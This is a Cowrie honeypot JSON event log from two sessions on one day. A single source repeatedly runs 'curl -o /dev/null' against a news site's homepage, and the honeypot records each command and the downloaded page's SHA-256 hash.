{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.992056Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.024818Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.025593Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.029736Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.030694Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.032887Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.035881Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.061130Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.062287Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.068713Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.069902Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.071921Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.097279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.099949Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.105116Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.109362Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.110483Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.123608Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.134979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.136019Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.146829Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.147681Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.176441Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.177177Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.183728Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.184735Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.212342Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.213373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.221507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.222440Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.250762Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.252266Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.261156Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.262295Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.290232Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.291573Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.301783Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.302807Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.331795Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.332949Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.342857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.343946Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.367880Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.368855Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.380636Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.385177Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.385968Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.403548Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.404735Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.422740Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.423637Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.439783Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.440953Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.461642Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.462876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.477662Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.479176Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.499818Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.508801Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.509733Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.520160Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.521274Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.539254Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.556911Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.557946Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.560865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.562367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.584118Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.587288Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.591201Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.594510Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.596087Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.599229Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.601086Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.602784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.604448Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.607450Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.608382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.644496Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.645723Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.651915Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.653106Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.680469Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.681463Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.694211Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.695162Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.718295Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.719320Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.731617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.732659Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.735056Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.740417Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.756751Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.757802Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.771180Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.772867Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.797830Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.798866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.828946Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.830132Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.838045Z","src_ip":"212.227.125.160","session":"7541ed730449"}
